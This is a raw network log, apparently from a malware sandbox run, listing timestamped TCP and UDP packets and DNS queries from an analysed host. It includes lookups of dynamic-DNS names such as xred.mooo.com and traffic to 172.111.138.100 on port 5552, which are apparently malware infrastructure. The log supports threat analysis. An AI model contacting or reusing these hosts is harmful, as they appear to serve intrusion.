                                                                                                                                                                                    Dec 30, 2024 11:52:35.708568096 CET52372443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:35.709276915 CET52374443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:35.709284067 CET44352374142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:35.711390972 CET52372443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:35.711395025 CET44352372142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:35.711657047 CET44352372142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:35.711749077 CET52372443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:35.712224960 CET52372443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:35.715603113 CET44352374142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:35.715734005 CET52374443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:35.716094017 CET52374443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:35.755363941 CET44352372142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:35.759375095 CET44352374142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.078867912 CET44352374142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.078963995 CET52374443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.078989983 CET44352374142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.079041958 CET52374443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.079415083 CET44352374142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.079468966 CET44352374142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.079519033 CET52374443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.084762096 CET44352372142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.084834099 CET52372443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.084857941 CET44352372142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.084908962 CET52372443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.085629940 CET44352372142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.085685968 CET44352372142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.085714102 CET52372443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.085736990 CET52372443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.114662886 CET44352373142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.114727020 CET44352373142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.114947081 CET52373443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:36.114968061 CET44352373142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.115012884 CET52373443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:36.115022898 CET44352373142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.115053892 CET44352373142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.115103006 CET52373443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:36.162404060 CET52374443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.162439108 CET44352374142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.163209915 CET52377443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.163263083 CET44352377142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.163331032 CET52377443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.163582087 CET52377443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.163594007 CET44352377142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.175894976 CET52372443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.175921917 CET44352372142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.184497118 CET52378443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.184545040 CET44352378142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.184660912 CET52378443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.184848070 CET52378443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.184863091 CET44352378142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.250674009 CET52373443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:36.250705957 CET44352373142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.389812946 CET52379443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:36.389853001 CET44352379142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.389930964 CET52379443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:36.391206980 CET52380443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:36.391273022 CET44352380142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.391335011 CET52380443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:36.396282911 CET52379443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:36.396307945 CET44352379142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.397671938 CET52380443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:36.397692919 CET44352380142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.759514093 CET44352377142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.759597063 CET52377443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.760076046 CET52377443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.760091066 CET44352377142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.761881113 CET52377443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.761885881 CET44352377142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.793809891 CET44352378142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.793908119 CET52378443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.794259071 CET52378443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.794267893 CET44352378142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.794488907 CET52378443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:36.794495106 CET44352378142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.996004105 CET44352379142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.996131897 CET52379443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:36.996603012 CET52379443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:36.996611118 CET44352379142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.997544050 CET44352380142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.997620106 CET52380443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:36.998373032 CET52379443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:36.998378992 CET44352379142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.998718023 CET52380443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:36.998724937 CET44352380142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:36.998851061 CET52380443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:36.998856068 CET44352380142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.137377977 CET44352377142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.137465000 CET52377443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.137482882 CET44352377142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.137615919 CET52377443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.137963057 CET52377443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.138001919 CET44352377142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.138051033 CET52377443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.141452074 CET52381443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.141494989 CET44352381142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.141551971 CET52381443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.141901970 CET52381443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.141917944 CET44352381142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.177376032 CET44352378142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.177596092 CET52378443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.177618980 CET44352378142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.177840948 CET52378443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.178910017 CET52378443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.178955078 CET44352378142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.179003000 CET52378443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.179634094 CET52382443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.179665089 CET44352382142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.179722071 CET52382443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.180609941 CET52382443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.180624008 CET44352382142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.432097912 CET44352380142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.432154894 CET44352380142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.432163954 CET52380443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:37.432193041 CET44352380142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.432204962 CET52380443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:37.432226896 CET52380443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:37.432231903 CET44352380142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.432270050 CET44352380142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.432290077 CET52380443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:37.432308912 CET52380443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:37.433357000 CET52380443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:37.433372974 CET44352380142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.433964014 CET52383443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:37.434014082 CET44352383142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.434077024 CET52383443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:37.434261084 CET52383443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:37.434273005 CET44352383142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.501441956 CET44352379142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.501514912 CET44352379142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.501511097 CET52379443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:37.501543999 CET44352379142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.501559019 CET52379443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:37.501584053 CET52379443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:37.501600027 CET44352379142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.501632929 CET44352379142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.501648903 CET52379443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:37.501688004 CET52379443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:37.502410889 CET52379443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:37.502424955 CET44352379142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.503185034 CET52384443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:37.503237963 CET44352384142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.503298998 CET52384443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:37.503485918 CET52384443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:37.503500938 CET44352384142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.742364883 CET44352381142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.742486954 CET52381443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.743020058 CET44352381142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.743158102 CET52381443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.745368958 CET52381443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.745381117 CET44352381142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.745588064 CET44352381142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.745636940 CET52381443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.746249914 CET52381443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.780355930 CET44352382142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.781186104 CET44352382142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.781229973 CET52382443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.781255960 CET44352382142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.783262014 CET52382443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.786322117 CET52382443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.786328077 CET44352382142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.786586046 CET44352382142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.786703110 CET52382443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.787151098 CET52382443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:37.791335106 CET44352381142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:37.831331015 CET44352382142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.033560991 CET44352383142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.033809900 CET52383443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:38.034323931 CET52383443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:38.034351110 CET44352383142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.034548998 CET52383443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:38.034568071 CET44352383142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.116951942 CET44352381142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.117094994 CET52381443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:38.117114067 CET44352381142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.117181063 CET52381443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:38.117841959 CET52381443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:38.117882013 CET44352381142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.117933989 CET52386443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:38.117965937 CET44352386142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.118037939 CET44352381142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.118055105 CET52386443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:38.118060112 CET52381443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:38.118089914 CET52381443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:38.119743109 CET52386443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:38.119767904 CET44352386142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.121064901 CET44352384142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.121258974 CET52384443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:38.123593092 CET52384443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:38.123593092 CET52384443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:38.123603106 CET44352384142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.123625040 CET44352384142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.160275936 CET44352382142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.160435915 CET52382443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:38.160509109 CET52382443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:38.160545111 CET44352382142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.160722017 CET44352382142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.160742998 CET52382443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:38.160804987 CET52382443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:38.161824942 CET52387443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:38.161850929 CET44352387142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.162056923 CET52387443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:38.162286997 CET52387443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:38.162301064 CET44352387142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.454449892 CET44352383142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.454507113 CET44352383142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.454538107 CET52383443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:38.454557896 CET44352383142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.454588890 CET52383443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:38.454628944 CET44352383142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.454658985 CET52383443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:38.456599951 CET52383443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:38.457885981 CET52383443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:38.457926989 CET44352383142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.459369898 CET52388443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:38.459427118 CET44352388142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.459878922 CET52388443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:38.459878922 CET52388443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:38.459913969 CET44352388142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.615376949 CET44352384142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.615426064 CET44352384142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.615562916 CET44352384142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.615600109 CET52384443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:38.615649939 CET52384443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:38.733751059 CET44352386142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.733896017 CET52386443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:38.736577988 CET44352386142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.736654997 CET52386443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:38.780487061 CET44352387142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.780603886 CET52387443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:38.781146049 CET44352387142.250.181.238192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:38.781200886 CET52387443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:52:39.078149080 CET44352388142.250.185.193192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:39.078238010 CET52388443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:52:52.333216906 CET555249753172.111.138.100192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:52.414495945 CET497535552192.168.2.4172.111.138.100
                                                                                                                                                                                    Dec 30, 2024 11:53:08.587562084 CET5192680192.168.2.469.42.215.252
                                                                                                                                                                                    Dec 30, 2024 11:53:08.590226889 CET52386443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:53:08.590307951 CET52384443192.168.2.4142.250.185.193
                                                                                                                                                                                    Dec 30, 2024 11:53:08.590368032 CET52387443192.168.2.4142.250.181.238
                                                                                                                                                                                    Dec 30, 2024 11:53:08.590394020 CET52388443192.168.2.4142.250.185.193

                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Dec 30, 2024 11:50:48.868541956 CET5080153192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 30, 2024 11:50:48.885637045 CET53508011.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:00.443514109 CET5273153192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 30, 2024 11:51:00.450119019 CET53527311.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:01.373234034 CET5806853192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 30, 2024 11:51:01.381278992 CET53580681.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:01.744460106 CET6299953192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 30, 2024 11:51:01.751761913 CET53629991.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:01.796942949 CET4984453192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 30, 2024 11:51:01.803744078 CET53498441.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.809252977 CET6072753192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 30, 2024 11:51:05.817011118 CET53607271.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:11.922426939 CET5618853192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 30, 2024 11:51:11.930007935 CET53561881.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:18.046333075 CET5362151162.159.36.2192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:18.607368946 CET5949053192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 30, 2024 11:51:18.614425898 CET53594901.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:49.690510988 CET5724353192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 30, 2024 11:51:49.697319984 CET53572431.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:50.463603973 CET5007853192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 30, 2024 11:51:50.471488953 CET53500781.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:50.480598927 CET5178253192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 30, 2024 11:51:50.487731934 CET53517821.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:50.722320080 CET5026153192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 30, 2024 11:51:50.729662895 CET53502611.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:56.712852001 CET5806253192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 30, 2024 11:51:56.720623016 CET53580621.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:03.791120052 CET6529453192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 30, 2024 11:52:03.798474073 CET53652941.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:10.619386911 CET6442653192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 30, 2024 11:52:10.626672029 CET53644261.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:17.434572935 CET6469953192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 30, 2024 11:52:17.442625999 CET53646991.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:21.979717970 CET5304553192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 30, 2024 11:52:21.986757994 CET53530451.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:27.681797981 CET5853653192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 30, 2024 11:52:27.689008951 CET53585361.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:52:34.512938023 CET5449253192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 30, 2024 11:52:34.520215988 CET53544921.1.1.1192.168.2.4

                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                    Dec 30, 2024 11:50:48.868541956 CET192.168.2.41.1.1.10x497Standard query (0)filedn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:00.443514109 CET192.168.2.41.1.1.10x31c3Standard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:01.373234034 CET192.168.2.41.1.1.10xb8eeStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:01.744460106 CET192.168.2.41.1.1.10xe6c4Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:01.796942949 CET192.168.2.41.1.1.10x534aStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
